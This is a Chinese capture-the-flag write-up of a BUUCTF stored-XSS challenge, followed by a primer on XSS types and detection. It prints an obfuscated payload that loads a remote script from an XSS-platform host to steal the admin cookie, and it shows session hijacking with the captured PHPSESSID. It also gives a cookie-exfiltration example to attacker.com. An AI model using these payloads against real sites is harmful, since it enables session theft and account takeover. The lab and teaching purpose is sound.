1.【BUUCTF】BUU XSS COURSE 11及XSS知识点

进入题目页面如下,有吐槽和登录两个可注入点

根据题目可知是一道XSS

登陆界面没有注册,尝试简单的SQL注入也不行

回到吐槽界面,输入简单的xss代码

<script>alert(1)</script>

访问网址,发现回显不出来,猜测是存储型xss,通过吐槽功能插入xss代码,获取cookie登录后台

可以使用下面这个平台,创建项目
XSS安全平台

在平台创建项目

下一步时选择这个,再滑到最下面点击下一步就创建成功了

在跳转的页面在给出了很多语句,选择其中一个复制

复制代码
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvM2c3Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== onerror=eval(atob(this.id))>

在吐槽处粘贴,并提交,提示成功

访问它所给的url,因为靶机过期了,这里更换了靶机所以url不一样哈

在xss平台查看cookie值,接收到了两个内容,其中第二个是管理员内容,查看cookie值

获取到了 cookie :

PHPSESSID=b699f6cfc0171e76519d53e0cdde912f

访问后台路径

http://web/backend/admin.php

根据提示构造url并访问

http://6d8981fb-8b3b-41f5-8332-1acf3cd56aff.node5.buuoj.cn:81/backend/admin.php

还没改cookie qyq

在burp suite中抓包,修改cookie值并放行

点击放行,最终得到flag


XSS知识点

跨站脚本攻击(简称 XSS)是一种常见的 Web 安全漏洞,可以通过注入恶意脚本到网页中,当用户访问该页面时,脚本会在用户的浏览器中执行,从而获取用户的敏感信息或执行其他恶意操作。

XSS 攻击类型

反射型 XSS

原理:攻击者构造包含恶意脚本的 URL,诱导用户点击。服务器接收到请求后,将恶意脚本作为响应的一部分返回给浏览器,浏览器会执行该脚本。

示例:搜索页面中,如果搜索关键词直接显示在页面上,攻击者可以构造包含恶意脚本的搜索关键词,如 <script>alert('XSS')</script>,当用户点击包含该关键词的链接时,服务器返回的页面会执行该脚本弹出提示框。

存储型 XSS

原理:攻击者将恶意脚本提交到网站的数据库中,当其他用户访问包含该恶意脚本的页面时,浏览器会执行该脚本。

示例:在论坛的留言板中,攻击者提交一条包含恶意脚本的留言,如 <script>document.location='http://attacker.com?cookie='+document.cookie\</script>。当其他用户查看该留言时,脚本会将用户的 cookie 信息发送到攻击者的服务器。

DOM 型XSS

原理:基于 DOM(文档对象模型)的 XSS 攻击不依赖于服务器端的响应,而是通过修改页面的 DOM 结构来注入恶意脚本。攻击者通过构造特定的 URL 或表单数据,使浏览器在处理页面时动态地将恶意脚本插入到 DOM 中并执行。

示例:页面中有一个 JavaScript 代码根据 URL 参数修改页面内容,如 document.getElementById('content').innerHTML = location.hash.substr(1);,攻击者可以构造包含恶意脚本的 URL,如 http://example.com/#\<script>alert('XSS')</script>,当用户访问该 URL 时,浏览器会执行脚本。

XSS 攻击危害

窃取用户信息:攻击者可以通过 XSS 脚本获取用户的 cookie、会话令牌等敏感信息,从而假冒用户身份登录网站,进行各种操作。

篡改页面内容:攻击者可以修改页面的显示内容,误导用户,如修改登录表单的提交地址,将用户输入的账号密码发送到攻击者的服务器。

执行恶意操作:在用户的浏览器中执行恶意代码,如安装恶意软件、发起 DDoS 攻击等。

XSS 攻击的注入点

URL 参数:很多 Web 应用会根据 URL 参数动态生成页面内容,攻击者可以在 URL 参数中注入恶意脚本。

表单输入:用户在表单中输入的内容如果没有经过严格过滤和验证,可能会被作为恶意脚本注入到页面中。

HTTP 头部:某些情况下,HTTP 头部信息也可能被用于 XSS 攻击,如 Referer 头部。

检测 XSS 漏洞

手动测试:通过构造包含常见 XSS 测试代码的输入,如 <script>alert('XSS')</script>、<img src=x onerror=alert('XSS')> 等,观察页面是否执行了这些脚本。

自动化工具:使用专业的安全扫描工具,如 OWASP ZAP、Nessus 等,对网站进行全面扫描,检测是否存在 XSS 漏洞。

相关推荐
DevSecOps选型指南5 小时前
2025软件供应链安全最佳实践︱证券DevSecOps下供应链与开源治理实践
网络·安全·web安全·开源·代码审计·软件供应链安全
ABB自动化5 小时前
for AC500 PLCs 3ADR025003M9903的安全说明
服务器·安全·机器人
恰薯条的屑海鸥5 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十六期-SSRF模块)
数据库·学习·安全·web安全·渗透测试·网络安全学习
国科安芯6 小时前
抗辐照MCU在卫星载荷电机控制器中的实践探索
网络·嵌入式硬件·硬件工程·智能硬件·空间计算
阿部多瑞 ABU6 小时前
主流大语言模型安全性测试(三):阿拉伯语越狱提示词下的表现与分析
人工智能·安全·ai·语言模型·安全性测试
EasyDSS7 小时前
国标GB28181设备管理软件EasyGBS远程视频监控方案助力高效安全运营
网络·人工智能
玩转4G物联网7 小时前
零基础玩转物联网-串口转以太网模块如何快速实现与TCP服务器通信
服务器·网络·物联网·网络协议·tcp/ip·http·fs100p
派阿喵搞电子7 小时前
Ubuntu下有关UDP网络通信的指令
linux·服务器·网络
网安INF7 小时前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
lubiii_7 小时前
墨者学院-密码学实训隐写术第二题
web安全·网络安全·密码学